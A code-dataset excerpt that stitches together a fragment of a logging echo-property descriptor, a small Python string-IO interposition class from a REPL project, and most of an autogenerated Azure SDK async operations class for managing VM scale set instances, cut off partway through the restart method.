This has the effect of setting the Python logging level for the namespace
of this element's class and object reference. A value of boolean ``True``
indicates that the loglevel ``logging.INFO`` will be set for the logger,
whereas the string value ``debug`` will set the loglevel to
``logging.DEBUG``.
"""
@overload
def __get__(
self, instance: Literal[None], owner: Type[Identified]
) -> echo_property:
...
@overload
def __get__(
self, instance: Identified, owner: Type[Identified]
) -> _EchoFlagType:
...
def __get__(
self, instance: Optional[Identified], owner: Type[Identified]
) -> Union[echo_property, _EchoFlagType]:
if instance is None:
return self
else:
return instance._echo
def __set__(self, instance: Identified, value: _EchoFlagType) -> None:
instance_logger(instance, echoflag=value)
| true
| true
|
f7050bd0c8ce3ae371a054a6377ad40107a35adf
| 602
|
py
|
Python
|
repl/InterposedIO.py
|
freeman-lab/pyrepl
|
d7312778e1f6d5afddbe51d1ae6f604fcf9fc73f
|
[
"MIT"
] | 9
|
2018-03-17T01:59:08.000Z
|
2021-07-30T13:36:46.000Z
|
repl/InterposedIO.py
|
chanzuckerberg/pyrepl
|
c3c366a0c7178a0c00a839b489bfcd0929e220d7
|
[
"MIT"
] | null | null | null |
repl/InterposedIO.py
|
chanzuckerberg/pyrepl
|
c3c366a0c7178a0c00a839b489bfcd0929e220d7
|
[
"MIT"
] | null | null | null |
"""
Stream IO interposition
"""
import io
class InterposedStringIO(io.StringIO):
def __init__(self, newline="\n", line_buffering = False, onflush=None):
super().__init__(newline=newline)
self._line_buffering = line_buffering
self._onflush = onflush
def flush(self):
s = self.getvalue()
self.seek(io.SEEK_SET, 0)
self.truncate()
if self._onflush:
self._onflush(s)
def write(self, s):
super().write(s)
if self._line_buffering and ('\n' in s or '\r' in s):
self.flush()
| 25.083333
| 76
| 0.571429
|
import io
class InterposedStringIO(io.StringIO):
def __init__(self, newline="\n", line_buffering = False, onflush=None):
super().__init__(newline=newline)
self._line_buffering = line_buffering
self._onflush = onflush
def flush(self):
s = self.getvalue()
self.seek(io.SEEK_SET, 0)
self.truncate()
if self._onflush:
self._onflush(s)
def write(self, s):
super().write(s)
if self._line_buffering and ('\n' in s or '\r' in s):
self.flush()
| true
| true
|
f7050c7044587c7a03a7e83f1453f954e296f2ad
| 49,770
|
py
|
Python
|
sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2017_03_30/aio/operations/_virtual_machine_scale_set_vms_operations.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 1
|
2021-09-07T18:39:05.000Z
|
2021-09-07T18:39:05.000Z
|
sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2017_03_30/aio/operations/_virtual_machine_scale_set_vms_operations.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | null | null | null |
sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2017_03_30/aio/operations/_virtual_machine_scale_set_vms_operations.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 1
|
2022-03-04T06:21:56.000Z
|
2022-03-04T06:21:56.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._virtual_machine_scale_set_vms_operations import build_deallocate_request_initial, build_delete_request_initial, build_get_instance_view_request, build_get_request, build_list_request, build_power_off_request_initial, build_reimage_all_request_initial, build_reimage_request_initial, build_restart_request_initial, build_start_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VirtualMachineScaleSetVMsOperations:
"""VirtualMachineScaleSetVMsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.compute.v2017_03_30.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _reimage_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_reimage_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._reimage_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_reimage_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimage'} # type: ignore
@distributed_trace_async
async def begin_reimage(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Reimages (upgrade the operating system) a specific virtual machine in a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._reimage_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_reimage.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimage'} # type: ignore
async def _reimage_all_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_reimage_all_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._reimage_all_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_reimage_all_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimageall'} # type: ignore
@distributed_trace_async
async def begin_reimage_all(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Allows you to re-image all the disks ( including data disks ) in the a VM scale set instance.
This operation is only supported for managed disks.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._reimage_all_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_reimage_all.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimageall'} # type: ignore
async def _deallocate_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_deallocate_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._deallocate_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_deallocate_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/deallocate'} # type: ignore
@distributed_trace_async
async def begin_deallocate(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Deallocates a specific virtual machine in a VM scale set. Shuts down the virtual machine and
releases the compute resources it uses. You are not billed for the compute resources of this
virtual machine once it is deallocated.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._deallocate_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_deallocate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/deallocate'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'} # type: ignore
@distributed_trace_async
async def begin_delete(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Deletes a virtual machine from a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> "_models.VirtualMachineScaleSetVM":
"""Gets a virtual machine from a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualMachineScaleSetVM, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2017_03_30.models.VirtualMachineScaleSetVM
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetVM"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualMachineScaleSetVM', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'} # type: ignore
@distributed_trace_async
async def get_instance_view(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> "_models.VirtualMachineScaleSetVMInstanceView":
"""Gets the status of a virtual machine from a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualMachineScaleSetVMInstanceView, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2017_03_30.models.VirtualMachineScaleSetVMInstanceView
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetVMInstanceView"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_instance_view_request(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self.get_instance_view.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualMachineScaleSetVMInstanceView', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_instance_view.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/instanceView'} # type: ignore
@distributed_trace
def list(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
filter: Optional[str] = None,
select: Optional[str] = None,
expand: Optional[str] = None,
**kwargs: Any
) -> AsyncIterable["_models.VirtualMachineScaleSetVMListResult"]:
"""Gets a list of all virtual machines in a VM scale sets.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the VM scale set.
:type virtual_machine_scale_set_name: str
:param filter: The filter to apply to the operation. Allowed values are
'startswith(instanceView/statuses/code, 'PowerState') eq true', 'properties/latestModelApplied
eq true', 'properties/latestModelApplied eq false'.
:type filter: str
:param select: The list parameters. Allowed values are 'instanceView', 'instanceView/statuses'.
:type select: str
:param expand: The expand expression to apply to the operation. Allowed values are
'instanceView'.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualMachineScaleSetVMListResult or the result
of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2017_03_30.models.VirtualMachineScaleSetVMListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetVMListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
virtual_machine_scale_set_name=virtual_machine_scale_set_name,
subscription_id=self._config.subscription_id,
filter=filter,
select=select,
expand=expand,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
resource_group_name=resource_group_name,
virtual_machine_scale_set_name=virtual_machine_scale_set_name,
subscription_id=self._config.subscription_id,
filter=filter,
select=select,
expand=expand,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("VirtualMachineScaleSetVMListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines'} # type: ignore
async def _power_off_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_power_off_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._power_off_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_power_off_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/poweroff'} # type: ignore
@distributed_trace_async
async def begin_power_off(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Power off (stop) a virtual machine in a VM scale set. Note that resources are still attached
and you are getting charged for the resources. Instead, use deallocate to release resources and
avoid charges.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._power_off_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_power_off.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/poweroff'} # type: ignore
async def _restart_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
